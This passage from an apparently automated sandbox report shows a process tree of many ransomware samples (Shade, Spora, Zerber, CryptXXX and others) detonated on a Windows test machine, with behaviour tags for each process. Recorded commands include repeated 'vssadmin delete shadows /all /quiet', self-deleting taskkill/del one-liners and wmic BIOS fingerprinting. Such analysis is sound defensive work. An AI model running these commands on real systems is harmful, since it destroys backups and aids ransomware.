                                                                                                          Trojan-Ransom.Win32.SageCrypt.e-f09493a029ce9f3025c9ba5c998d47b731babfd839c1e260bc3bbc3f80ca8dea.exe
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Sets desktop wallpaper using registry
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Modifies Control Panel
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                          • Suspicious use of UnmapMainImage
                                                                                                          PID:2200
                                                                                                          • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.SageCrypt.e-f09493a029ce9f3025c9ba5c998d47b731babfd839c1e260bc3bbc3f80ca8dea.exe
                                                                                                            "C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.SageCrypt.e-f09493a029ce9f3025c9ba5c998d47b731babfd839c1e260bc3bbc3f80ca8dea.exe" g
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of UnmapMainImage
                                                                                                            PID:1712
                                                                                                          • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                            "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                            4⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Interacts with shadow copies
                                                                                                            PID:3800
                                                                                                          • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                            "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                            4⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Interacts with shadow copies
                                                                                                            PID:1844
                                                                                                        • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Shade.nwx-4723cddbd699780906800050a2c28a03f61949985e52687cb20439f1d078d6a4.exe
                                                                                                          Trojan-Ransom.Win32.Shade.nwx-4723cddbd699780906800050a2c28a03f61949985e52687cb20439f1d078d6a4.exe
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                          PID:2108
                                                                                                          • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Shade.nwx-4723cddbd699780906800050a2c28a03f61949985e52687cb20439f1d078d6a4.exe
                                                                                                            Trojan-Ransom.Win32.Shade.nwx-4723cddbd699780906800050a2c28a03f61949985e52687cb20439f1d078d6a4.exe
                                                                                                            4⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:3656
                                                                                                        • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Shade.nxd-320c20ef85216f7e69ab8aa64f5f4fee4233a473a80350b2b9ead8cfcd51f9fa.exe
                                                                                                          Trojan-Ransom.Win32.Shade.nxd-320c20ef85216f7e69ab8aa64f5f4fee4233a473a80350b2b9ead8cfcd51f9fa.exe
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                          PID:912
                                                                                                          • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Shade.nxd-320c20ef85216f7e69ab8aa64f5f4fee4233a473a80350b2b9ead8cfcd51f9fa.exe
                                                                                                            Trojan-Ransom.Win32.Shade.nxd-320c20ef85216f7e69ab8aa64f5f4fee4233a473a80350b2b9ead8cfcd51f9fa.exe
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Adds Run key to start application
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:2260
                                                                                                        • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Shade.qnf-169c5a121fe0f6d847d5d54cb69a22ccbd519bc3bdb1d12e166e51056995ac7d.exe
                                                                                                          Trojan-Ransom.Win32.Shade.qnf-169c5a121fe0f6d847d5d54cb69a22ccbd519bc3bdb1d12e166e51056995ac7d.exe
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                          PID:904
                                                                                                          • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Shade.qnf-169c5a121fe0f6d847d5d54cb69a22ccbd519bc3bdb1d12e166e51056995ac7d.exe
                                                                                                            Trojan-Ransom.Win32.Shade.qnf-169c5a121fe0f6d847d5d54cb69a22ccbd519bc3bdb1d12e166e51056995ac7d.exe
                                                                                                            4⤵
                                                                                                              PID:3900
                                                                                                          • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Shade.vt-5d12a6d494f23294c4ea14493d1564a5d1fec5e561251a1283584de0101d51dd.exe
                                                                                                            Trojan-Ransom.Win32.Shade.vt-5d12a6d494f23294c4ea14493d1564a5d1fec5e561251a1283584de0101d51dd.exe
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:2132
                                                                                                            • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Shade.vt-5d12a6d494f23294c4ea14493d1564a5d1fec5e561251a1283584de0101d51dd.exe
                                                                                                              "C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Shade.vt-5d12a6d494f23294c4ea14493d1564a5d1fec5e561251a1283584de0101d51dd.exe"
                                                                                                              4⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:4172
                                                                                                          • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Shaitan.a-460b0151978e156fa80a075677e68f2d08b783c14d0325c4a9c899dc7613a9b2.exe
                                                                                                            Trojan-Ransom.Win32.Shaitan.a-460b0151978e156fa80a075677e68f2d08b783c14d0325c4a9c899dc7613a9b2.exe
                                                                                                            3⤵
                                                                                                            • Looks for VMWare Tools registry key
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                            PID:2272
                                                                                                            • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Shaitan.a-460b0151978e156fa80a075677e68f2d08b783c14d0325c4a9c899dc7613a9b2.exe
                                                                                                              Trojan-Ransom.Win32.Shaitan.a-460b0151978e156fa80a075677e68f2d08b783c14d0325c4a9c899dc7613a9b2.exe
                                                                                                              4⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:484
                                                                                                              • C:\Users\Admin\AppData\Roaming\Ceubb\quurb.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\Ceubb\quurb.exe"
                                                                                                                5⤵
                                                                                                                • Looks for VMWare Tools registry key
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:2920
                                                                                                                • C:\Users\Admin\AppData\Roaming\Ceubb\quurb.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Ceubb\quurb.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:812
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_5d9c310a.bat"
                                                                                                                5⤵
                                                                                                                  PID:2544
                                                                                                            • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Spora.eep-08cc3b1cab56f6c45f1800aa5af6d22cbbeab1bcffa7f70d536034f21a9d7573.exe
                                                                                                              Trojan-Ransom.Win32.Spora.eep-08cc3b1cab56f6c45f1800aa5af6d22cbbeab1bcffa7f70d536034f21a9d7573.exe
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                              PID:2164
                                                                                                            • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Spora.fjc-cf6a0d012ad7d5aa640cad93e87725e19f479233e7e75ac962bda3ab797bd064.exe
                                                                                                              Trojan-Ransom.Win32.Spora.fjc-cf6a0d012ad7d5aa640cad93e87725e19f479233e7e75ac962bda3ab797bd064.exe
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                              PID:1644
                                                                                                              • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Spora.fjc-cf6a0d012ad7d5aa640cad93e87725e19f479233e7e75ac962bda3ab797bd064.exe
                                                                                                                Trojan-Ransom.Win32.Spora.fjc-cf6a0d012ad7d5aa640cad93e87725e19f479233e7e75ac962bda3ab797bd064.exe
                                                                                                                4⤵
                                                                                                                • Drops startup file
                                                                                                                PID:3916
                                                                                                                • C:\Users\Admin\AppData\Local\ParamsMspthrd\ParamsMspthrd.exe
                                                                                                                  -U39163908259569673
                                                                                                                  5⤵
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:5308
                                                                                                                  • C:\Users\Admin\AppData\Local\ParamsMspthrd\ParamsMspthrd.exe
                                                                                                                    -U39163908259569673
                                                                                                                    6⤵
                                                                                                                      PID:3100
                                                                                                              • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Spora.ibk-38a8b94e6b291d39dc556c2a10cf35bdef1b87dce58dad63410b43ebe5ac7ccb.exe
                                                                                                                Trojan-Ransom.Win32.Spora.ibk-38a8b94e6b291d39dc556c2a10cf35bdef1b87dce58dad63410b43ebe5ac7ccb.exe
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                PID:984
                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Spora.ibk-38a8b94e6b291d39dc556c2a10cf35bdef1b87dce58dad63410b43ebe5ac7ccb.exe
                                                                                                                  Trojan-Ransom.Win32.Spora.ibk-38a8b94e6b291d39dc556c2a10cf35bdef1b87dce58dad63410b43ebe5ac7ccb.exe
                                                                                                                  4⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:2772
                                                                                                              • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Wanna.zbu-0a119c83af641d36c78ce619498ec6e68eea27d189f40dcec0d9c0ee94c80047.exe
                                                                                                                Trojan-Ransom.Win32.Wanna.zbu-0a119c83af641d36c78ce619498ec6e68eea27d189f40dcec0d9c0ee94c80047.exe
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3016
                                                                                                              • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Zerber.dhg-2e3fc5446dd0130540473648d7d3f39fd722ccbdccc3ae571b33e9de76e7dcac.exe
                                                                                                                Trojan-Ransom.Win32.Zerber.dhg-2e3fc5446dd0130540473648d7d3f39fd722ccbdccc3ae571b33e9de76e7dcac.exe
                                                                                                                3⤵
                                                                                                                • Adds policy Run key to start application
                                                                                                                • Drops startup file
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Adds Run key to start application
                                                                                                                • Modifies Control Panel
                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2728
                                                                                                                • C:\Users\Admin\AppData\Roaming\{1591EC7F-A229-1145-B746-F357D6852359}\raserver.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\{1591EC7F-A229-1145-B746-F357D6852359}\raserver.exe"
                                                                                                                  4⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3572
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  /d /c taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.dhg-2e3fc5446dd0130540473648d7d3f39fd722ccbdccc3ae571b33e9de76e7dcac.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Zerber.dhg-2e3fc5446dd0130540473648d7d3f39fd722ccbdccc3ae571b33e9de76e7dcac.exe" > NUL
                                                                                                                  4⤵
                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                  PID:5604
                                                                                                              • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Zerber.txn-274d4f54ee3fe60afcd6c7c146fb31eded307a4f54666ed500b74254bbed2fb1.exe
                                                                                                                Trojan-Ransom.Win32.Zerber.txn-274d4f54ee3fe60afcd6c7c146fb31eded307a4f54666ed500b74254bbed2fb1.exe
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:2932
                                                                                                                • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Zerber.txn-274d4f54ee3fe60afcd6c7c146fb31eded307a4f54666ed500b74254bbed2fb1.exe
                                                                                                                  Trojan-Ransom.Win32.Zerber.txn-274d4f54ee3fe60afcd6c7c146fb31eded307a4f54666ed500b74254bbed2fb1.exe
                                                                                                                  4⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2552
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe"
                                                                                                                    5⤵
                                                                                                                      PID:1788
                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\README.hta"
                                                                                                                      5⤵
                                                                                                                        PID:204
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        "C:\Windows\system32\cmd.exe"
                                                                                                                        5⤵
                                                                                                                          PID:2564
                                                                                                                    • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Zerber.wtf-453a53b87cdd4928f593bcbaaaeab59ef165f288bd8fc92cff7366994ddbc640.exe
                                                                                                                      Trojan-Ransom.Win32.Zerber.wtf-453a53b87cdd4928f593bcbaaaeab59ef165f288bd8fc92cff7366994ddbc640.exe
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                      PID:2020
                                                                                                                      • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Zerber.wtf-453a53b87cdd4928f593bcbaaaeab59ef165f288bd8fc92cff7366994ddbc640.exe
                                                                                                                        Trojan-Ransom.Win32.Zerber.wtf-453a53b87cdd4928f593bcbaaaeab59ef165f288bd8fc92cff7366994ddbc640.exe
                                                                                                                        4⤵
                                                                                                                          PID:3724
                                                                                                                      • C:\Users\Admin\Desktop\00296\UDS-Trojan-Ransom.Win32.CryptXXX.sb-9c78b16718ca762c0066e122021cf73e39216ccc46d8a66e03eaa49a72c89bc2.exe
                                                                                                                        UDS-Trojan-Ransom.Win32.CryptXXX.sb-9c78b16718ca762c0066e122021cf73e39216ccc46d8a66e03eaa49a72c89bc2.exe
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                        PID:2968
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ddacabfcdcab.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ddacabfcdcab.exe 7-6-1-0-5-5-3-1-5-6-3 KEpIRDgxMDcbKVBOPE9JPzgtHypIQk1RTlJGREE8LBosPUNSVEQ/OjQvLh0oPUhEOCsdLktMTD1PQlRaREE8LzAuGSlSRU1RQlFaT09FN2d0b2s3Liptb28oQ0VORipTSkoqOkpPLkRJQ04bKUBFQ0JLRD86Hyo+LjYuLzguLDQ0GylBKzc2MzAbLEMuNyoqGi5ELzgqMBspQS43LDEbKk1RSj5SPE5eUE1EU0A+UzoZKU9SSj9SQk9ZQk5GQD0bKk1RSj5SPE5eTjxIQjxPUB0oP1dFWlBPSzgaLD5SRF8+SEFLREhCNhouSEpOUV49TExQTURSODAdLk9CPkdFWE9QWlJRRzcdKFBMPS0bLENOKzoZKVFVSU9GTEBZVD5GQk9IQEZMPEFCTkxLPRsqRlJaTFJHTkhNQDhxcXBfHShMRFRQTUtISUFcTk1EUlo/PlhONy8ZKUdJP0BVPCwaLEJNXkRUST5MRD1cPkhCUlRLUUQ/N2NaZnJlGypBTlJISUg7Q19ESzoxKzIrKisvLjQuKzAtLB0oTkhNQDguMy0xNCszNDQ0GyxDSlFLRUlARFpPRkxANzAoLS8vLSsuNCUtNywsOTI0JU1M
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:2652
                                                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                            wmic /output:C:\Users\Admin\AppData\Local\Temp\81731860692.txt bios get serialnumber
                                                                                                                            5⤵
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2868
                                                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                            wmic /output:C:\Users\Admin\AppData\Local\Temp\81731860692.txt bios get version
                                                                                                                            5⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:4336
                                                                                                                      • C:\Users\Admin\Desktop\00296\VHO-Trojan-Ransom.Win32.Convagent.gen-515c0fd6f90e7729ea25ac2169e0b37c314e5bf42d1fc9286299582e5aab5989.exe
                                                                                                                        VHO-Trojan-Ransom.Win32.Convagent.gen-515c0fd6f90e7729ea25ac2169e0b37c314e5bf42d1fc9286299582e5aab5989.exe
                                                                                                                        3⤵
                                                                                                                        • Adds policy Run key to start application
                                                                                                                        • Drops startup file
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Adds Run key to start application
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Modifies Control Panel
                                                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        • Suspicious use of UnmapMainImage
                                                                                                                        PID:1456
                                                                                                                        • C:\Users\Admin\AppData\Roaming\{1591EC7F-A229-1145-B746-F357D6852359}\gpresult.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\{1591EC7F-A229-1145-B746-F357D6852359}\gpresult.exe"
                                                                                                                          4⤵
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          • Suspicious use of UnmapMainImage
                                                                                                                          PID:3772
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /d /c taskkill /t /f /im "VHO-Trojan-Ransom.Win32.Convagent.gen-515c0fd6f90e7729ea25ac2169e0b37c314e5bf42d1fc9286299582e5aab5989.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00296\VHO-Trojan-Ransom.Win32.Convagent.gen-515c0fd6f90e7729ea25ac2169e0b37c314e5bf42d1fc9286299582e5aab5989.exe" > NUL
                                                                                                                          4⤵
                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                          PID:4136
                                                                                                                      • C:\Users\Admin\Desktop\00296\VHO-Trojan-Ransom.Win32.ZedoPoo.gen-e1bf7be8b16e4b9968a2643c637956f1fba7f7332816d1bb4fd75ce177a52f86.exe
                                                                                                                        VHO-Trojan-Ransom.Win32.ZedoPoo.gen-e1bf7be8b16e4b9968a2643c637956f1fba7f7332816d1bb4fd75ce177a52f86.exe
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                        PID:1840
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-MAK88.tmp\VHO-Trojan-Ransom.Win32.ZedoPoo.gen-e1bf7be8b16e4b9968a2643c637956f1fba7f7332816d1bb4fd75ce177a52f86.tmp
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-MAK88.tmp\VHO-Trojan-Ransom.Win32.ZedoPoo.gen-e1bf7be8b16e4b9968a2643c637956f1fba7f7332816d1bb4fd75ce177a52f86.tmp" /SL5="$9022A,5773711,115200,C:\Users\Admin\Desktop\00296\VHO-Trojan-Ransom.Win32.ZedoPoo.gen-e1bf7be8b16e4b9968a2643c637956f1fba7f7332816d1bb4fd75ce177a52f86.exe"
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:2428
                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                            "C:\Windows\system32\rundll32.exe" "c:\Program Files (x86)\Optimizer Pro\OptProCrash.dll",ENT -install
                                                                                                                            5⤵
                                                                                                                              PID:5180
                                                                                                                            • C:\Program Files (x86)\Optimizer Pro\TailReaderConsole.exe
                                                                                                                              "C:\Program Files (x86)\Optimizer Pro\TailReaderConsole.exe"
                                                                                                                              5⤵
                                                                                                                                PID:5140
                                                                                                                              • C:\Program Files (x86)\Optimizer Pro\TailReaderConsole.exe
                                                                                                                                "C:\Program Files (x86)\Optimizer Pro\TailReaderConsole.exe" 1 2 1
                                                                                                                                5⤵
                                                                                                                                  PID:5580
                                                                                                                                • C:\Program Files (x86)\Optimizer Pro\Optimizer Pro.exe
                                                                                                                                  "C:\Program Files (x86)\Optimizer Pro\Optimizer Pro.exe" /install
                                                                                                                                  5⤵
                                                                                                                                    PID:204
                                                                                                                                  • C:\Program Files (x86)\Optimizer Pro\TailReaderConsole.exe
                                                                                                                                    "C:\Program Files (x86)\Optimizer Pro\TailReaderConsole.exe" "C:\Users\Admin\Desktop\00296\VHO-Trojan-Ransom.Win32.ZedoPoo.gen-e1bf7be8b16e4b9968a2643c637956f1fba7f7332816d1bb4fd75ce177a52f86.exe" /sendstat
                                                                                                                                    5⤵
                                                                                                                                      PID:4164
                                                                                                                                    • C:\Program Files (x86)\Optimizer Pro\Optimizer Pro.exe
                                                                                                                                      "C:\Program Files (x86)\Optimizer Pro\Optimizer Pro.exe" /scan
                                                                                                                                      5⤵
                                                                                                                                        PID:1528
                                                                                                                                • C:\Windows\system32\taskmgr.exe
                                                                                                                                  "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                  PID:2512
                                                                                                                                • C:\Windows\syswow64\svchost.exe
                                                                                                                                  "C:\Windows\syswow64\svchost.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Modifies WinLogon for persistence
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:576
                                                                                                                                • C:\Windows\System32\vssadmin.exe
                                                                                                                                  "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                                  2⤵
                                                                                                                                  • Interacts with shadow copies
                                                                                                                                  PID:3468
                                                                                                                                • C:\Windows\syswow64\svchost.exe
                                                                                                                                  "C:\Windows\syswow64\svchost.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Modifies WinLogon for persistence
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  PID:2672
                                                                                                                                • C:\Program Files (x86)\Optimizer Pro\Optimizer Pro.exe
                                                                                                                                  "C:\Program Files (x86)\Optimizer Pro\Optimizer Pro.exe"
                                                                                                                                  2⤵
                                                                                                                                    PID:3440
                                                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                    2⤵
                                                                                                                                      PID:4876
                                                                                                                                    • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Recovery+ceyqr.txt
                                                                                                                                      2⤵
                                                                                                                                        PID:4900
                                                                                                                                      • C:\Windows\regedit.exe
                                                                                                                                        "C:\Windows\regedit.exe"
                                                                                                                                        2⤵
                                                                                                                                        • Runs regedit.exe
                                                                                                                                        PID:4076
                                                                                                                                      • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\SetupExe(20240903051847924).log
                                                                                                                                        2⤵
                                                                                                                                          PID:3280
                                                                                                                                        • C:\Windows\system32\taskmgr.exe
                                                                                                                                          "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                          2⤵
                                                                                                                                            PID:6060
                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                          1⤵
                                                                                                                                            PID:468
                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe "-487099472188983089-18949373941499437132-355853797106034669-1088209161-928478477"
                                                                                                                                            1⤵
                                                                                                                                              PID:1860
                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe "9386684143135884-1211441038248975769197678623294719443-632259078-1792675041"
                                                                                                                                              1⤵
                                                                                                                                                PID:1664
                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe "1204046789-1338585585-1920534187-1188574460-2908681961811028916401421754-652661386"
                                                                                                                                                1⤵
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:932
                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe "13806411731796017598-357938628-1611309631-154486463016444802771508345881-1720635278"
                                                                                                                                                1⤵
                                                                                                                                                  PID:2572
                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "-1839141769-177833317837866575764529289119460272673630347041127176347794932959"
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1588
                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "2082403327-19672406821327838997-252001189-17679020881274177791294873330-135579007"
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:940
                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "791992634-881394654463463347594608603-1839033916-14113372311875271054998535944"
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    PID:1068
                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    PID:1540
                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "1711526319-1792071337-1394464071-1427291321-14788458221762134502-146537543-937202274"
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:3492
                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "-908320555-408053157124121576815070375622052742474-1224149937216772524-481353470"
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:3592
                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "-1857700080-1432617292004791490-910065244-390550455-428124810-4719425-1921731998"
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:2916
                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "113219101569524671157851939329740385-860133323-281089800-1809532351765890708"
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    PID:3388
                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "528243115-20557282011060428650-1797830178187556214911307908951771218991-1714010671"
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    PID:2660
                                                                                                                                                  • C:\Windows\system32\conhost.exe
